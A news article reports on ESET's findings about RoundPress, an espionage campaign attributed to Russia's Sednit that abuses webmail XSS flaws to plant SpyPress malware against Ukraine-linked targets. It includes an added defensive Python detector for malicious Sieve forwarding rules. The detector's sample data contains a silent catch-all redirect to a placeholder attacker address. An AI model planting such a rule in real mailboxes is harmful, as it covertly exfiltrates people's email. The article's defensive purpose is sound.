Russia-Linked SpyPress Malware Exploits Webmails to Spy on Ukraine

ESET reports on RoundPress, a cyber espionage campaign by Russia’s Fancy Bear (Sednit) targeting Ukraine-related organizations via webmail vulnerabilities and SpyPress malware.
Cybersecurity researchers at ESET have revealed a sophisticated cyber espionage campaign, codenamed RoundPress, assessing with “medium confidence” that it is orchestrated by the Russian-backed Sednit group (aka APT28, Fancy Bear). This operation is actively targeting organizations linked with the ongoing conflict in Ukraine, aiming to exfiltrate confidential data from vulnerable webmail servers like Roundcube.
The Sednit group, linked by the US Department of Justice to the 2016 Democratic National Committee (DNC) hack and tracked by Hackread.com in attacks on TV5Monde and WADA, has been employing targeted spearphishing emails in the RoundPress campaign.
These emails exploit Cross-Site Scripting (XSS) vulnerabilities in various webmail platforms to inject malicious JavaScript code, dubbed SpyPress, into the victim’s browser.
In ESET’s blog post, shared with Hackread.com, researchers noted that over the past two years, espionage groups have targeted webmail servers like Roundcube and Zimbra for email theft, because these servers are frequently left outdated and because their vulnerabilities can be triggered remotely, which makes them easier targets.
In 2023, researchers observed Sednit exploiting CVE-2020-35730 in Roundcube. However, in 2024, the campaign expanded to target vulnerabilities in:
- Horde (an older XSS flaw)
- Roundcube (CVE-2023-43770, patched on September 14, 2023)
- Zimbra (CVE-2024-27443, also known as ZBUG-3730, patched on March 1, 2024)
- MDaemon (CVE-2024-11182, a zero-day reported by researchers on November 1, 2024, and patched in version 24.5.1 on November 14, 2024)
ESET noted a specific spearphishing email sent on September 29, 2023, from katecohen1984@portugalmail.pt exploiting CVE-2023-43770 in Roundcube. The emails often mimic news content to entice victims to open them, such as an email to a Ukrainian target on September 11, 2024, from kyivinfo24@ukr.net about an alleged arrest in Kharkiv, and another to a Bulgarian target on November 8, 2024, from office@terembg.com regarding Putin and Trump.
The primary targets of Operation RoundPress in 2024, as identified through ESET telemetry and VirusTotal submissions, are predominantly Ukrainian governmental entities and defence companies in Bulgaria and Romania, some of which are producing Soviet-era weapons for Ukraine.
Researchers also observed targeting of national governments in Greece, Cameroon, Ecuador, Serbia, and Cyprus (an academic in environmental studies), a telecommunications firm for the defence sector in Bulgaria and a civil air transport company and transportation state company in Ukraine.
The SpyPress malware variants (SpyPress.HORDE, SpyPress.MDAEMON, SpyPress.ROUNDCUBE, and SpyPress.ZIMBRA) share obfuscation techniques and communicate with C2 servers via HTTP POST requests. However, their capabilities vary.
For instance, SpyPress.ROUNDCUBE has been observed creating Sieve rules to forward all incoming emails to an attacker-controlled address, such as srezoska@skiff.com (Skiff being a privacy-oriented email service). SpyPress.MDAEMON demonstrated the ability to create App Passwords, granting persistent access.
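As an added defender-side example (not code from ESET’s report or from this article), the script below scans per-user Sieve filter scripts, as a webmail backend such as Roundcube’s managesieve plugin stores them, for `redirect` actions that forward mail outside the organization, the persistence technique the article attributes to SpyPress.ROUNDCUBE. The sample scripts, the user names, the `corp.example` internal domain and the `attacker.example` address are all constructed placeholders.

```python
import re
from dataclasses import dataclass

# Constructed sample: Sieve scripts keyed by mailbox owner. Bob's script contains
# a catch-all forwarding rule of the kind described in the article (placeholder address).
SAMPLE_SCRIPTS = {
    "alice": 'require ["fileinto"];\nif header :contains "subject" "invoice" { fileinto "Finance"; }\n',
    "bob": ('require ["copy"];\n'
            '# harmless-looking comment\n'
            'if true { redirect :copy "collector@attacker.example"; }\n'
            'redirect "bob.backup@corp.example";\n'),
}
ORG_DOMAINS = {"corp.example"}  # assumed internal domains; anything else counts as external

# Sieve redirect action: `redirect [:copy] "address";` (RFC 5228, :copy from RFC 3894)
REDIRECT_RE = re.compile(r'\bredirect\b(?P<args>[^;]*?)"(?P<addr>[^"]+)"\s*;', re.IGNORECASE)

@dataclass
class Finding:
    user: str
    address: str
    copy: bool           # :copy keeps a local copy, so the victim sees nothing missing
    unconditional: bool  # fires for every message (top level, or guarded only by `if true`)

def strip_comments(script: str) -> str:
    """Drop Sieve `#` line comments and `/* */` block comments before matching."""
    script = re.sub(r'/\*.*?\*/', '', script, flags=re.S)
    return re.sub(r'#[^\n]*', '', script)

def scan_script(user: str, script: str, org_domains=ORG_DOMAINS) -> list[Finding]:
    """Return one Finding per redirect whose target domain is outside org_domains."""
    findings = []
    text = strip_comments(script)
    for m in REDIRECT_RE.finditer(text):
        addr = m.group("addr").strip()
        if addr.rsplit("@", 1)[-1].lower() in org_domains:
            continue
        prefix = text[:m.start()]
        depth = prefix.count("{") - prefix.count("}")  # 0 means top-level statement
        always_true = re.search(r'\bif\s+true\s*\{[^}]*$', prefix) is not None
        findings.append(Finding(user, addr, ":copy" in m.group("args"), depth == 0 or always_true))
    return findings

def scan_all(scripts=SAMPLE_SCRIPTS) -> list[Finding]:
    return [f for user, s in scripts.items() for f in scan_script(user, s)]

if __name__ == "__main__":
    for f in scan_all():
        print(f"ALERT user={f.user} forwards to {f.address} copy={f.copy} unconditional={f.unconditional}")
```

Running it against real managesieve storage means feeding each user's active script to `scan_script`; a hit on an external, unconditional `:copy` redirect is the signal worth paging on, since it is exactly the silent mailbox mirroring the article describes.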
Researchers concluded that the ongoing exploitation of webmail vulnerabilities by groups like Sednit underscores the importance of timely patching and strong security measures to protect sensitive information from such targeted spying campaigns.
J Stephen Kowski, Field CTO at SlashNext Email Security+, commented on the latest development, stating, “Attacks like Operation RoundPress show how quickly hackers can shift targets, especially when they find weaknesses in popular email platforms.”
“Whether you’re using paid commercial email systems or free, self-hosted open-source options like Roundcube, no solution is completely safe – self-hosted systems often give a false sense of security since they still need regular updates and expert maintenance,” he warned.
“The best way to stay ahead is by making sure email systems are always updated and patched, using strong protections like multi-factor authentication, and having tools that can spot and block phishing emails before they reach users,” Kowski advised.
HackRead